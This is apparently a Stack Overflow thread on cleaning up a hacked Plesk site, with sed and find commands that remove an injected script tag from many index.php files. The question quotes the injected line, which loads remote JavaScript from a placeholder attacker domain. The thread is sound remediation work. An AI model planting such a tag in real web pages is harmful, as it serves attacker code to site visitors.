# Linux command line : edit hacked index files

Tags: linux, security, command-line, plesk

I'm unfortunately once more dealing with a hacked site on a Linux Plesk server. While the issue is fixed with FTP access changed (it got down to the famous Filezilla FTP codes hack on a PC) I'd appreciate to know how to edit files as it may take over an hour to restore the site to the most recent backup we have, and I'd be glad to have it back online faster.
The hack is rather simple: a javascript code was inserted in many index* (only index.php it seems) files in the site.
I'm looking for a way to mass-edit the hacked files, knowing that even though the target javascript code is the same, it is called from a number of probably also hacked sites. So while my legitimate index file used to start with

```
<?php
```

it now starts like

```
<script type="text/javascript" src="http://(RANDOMDOMAINHERE)/facebook.php"></script><?php
```

As that chain contains a variable, could you help me find a sure-fire method to edit all the changed Index files (about 80 found) ?
I have used a SED replace before but this time part of the chain to replace varies, so could I use a wildcard ?
Best regards, thanks for shedding light !

Comment: @sehe Actually, I downvoted the answers because they do not answer the original poster's question and are frankly inflammatory. The OP has a whole slew of issues to deal with with the hacked server, and among them is repairing the damage, which is what this question pertains to. Maybe the OP should edit the post to say "I have identified and removed the vulnerability" in order to get legitimate help from the community.

Comment: I appreciate that you downvoted it. No harm. I'll remove snarky comment at OP. However, I _do feel_ both answers tried _honestly_ to prevent further hazard and damage. I do feel it is useless to start with another answer there.

Comment: This wonderful site is for helping people like me improve their knowledge on for example regular expressions and cli tools, not to receive half-assed wise and unuseful sarastic comments that help no one.

Comment: I wasn't asking for upvotes :) Though **[now](http://stackoverflow.com/questions/5750284/linux-command-line-edit-hacked-index-files/5750534#5750534)** I do

Comment: Try http://www.grymoire.com/Unix/Sed.html for tips on how to use the Stream editor for doing exactly this, you can probably isolate the random domain part with [0-9a-zA-Z.]+

Comment: @sehe and upvotes you've gotten! I apologize for being cross; thanks so much for posting an answer (which you posted I was able to finish mine, so no rep for me today!) :)

Answer (score 3):

```
find -name 'index.php' -print0 |
    xargs -0 sed -i '1s#^<script type="text/javascript" src="http://.*\?/facebook.php"></script>##g'
```

Should do wonders

the sed command:

- `1`  (match in first line)
- `s#pattern#replacement#g` (replace pattern by replacement, not that the latter is empty)
- `^` must match at start of line
- `.*\?` accept arbitrary length of sequence of characters; however if more than one a match for the whole pattern could be made, only match the shortest possible variant of it

Cheers

Comment: @poundifdef: thanks for catching that: it is a bad SO-habit to quote with `backticks`... I will start to watch that (first time it happened)

Comment: And to break it down: `xargs` takes each of the results returned by `find` and uses it as an argument in `sed`. `-i` does an in-place replacement of the file (which is passed as an argument to sed via xargs). and for the regex... well, someone else will have to shed light on how that regex works!

Comment: @poundifdef: some proze talk through added

Comment: Thans for the pointer, I ended up solving this with
sed -i 's_<script type="text/javascript" src=".*/facebook.php"></script><?php_<?php_' $hackedfile
in my bash loop; so I feel this was a useful exchange, not at all off topic.

Comment: I voted to reopen long time ago, but there still need to be more votes :) Cheers

Answer (score 1):

I sincerely hope your not actually adminning a production domain. You should inform your users, get the problem fixed, offer the users to go back to a recent backup that hasn't got the problem.

There is no telling what else has been tampered with.

I'm glad my VPS is somewhere else!

Comment: Not sure at which point I asked for advice on a context you know nothing about. There are no production sites and no users you should be worried about. Yes I did get a security issue on a server hosting a single test domain I work on, so this question is about help on mass-editing files, nothing else. I did vote down any answer but am glad some nice people felt like yours should be.

Comment: I think I mis-interpreted from 'unfortunately once more dealing with...' and '(about 80 found)' assuming 80 different sites :) Sry bout that. (_I back my advice, but since it is useless, I posted a real answer_)

Answer (score -1):

I would fix the Cross side scripting exploit before this problem is addressed or it will all be in vain. When thats done a simple search and replace of blocks of script that contain a common string should be sufficient.

Comment: "I would fix the Cross side scripting exploit before this problem is addressed or it will all be in vain."
It sure makes sense and I'm also inddeed working on that. Once it is dealt with though, I'd be glad to see an example of
"a simple search and replace of blocks of script that contain a common string".

Comment: Just to clarify, that hacking did *not* occur on our server side, and was technically an unauthorized access with a legitimate account, as changes on the server's websites occurred from credentials stolen on a hacked Windows PC, apparenly in the Filezilla unencrypted stored credentials. Thanks for the efficient help.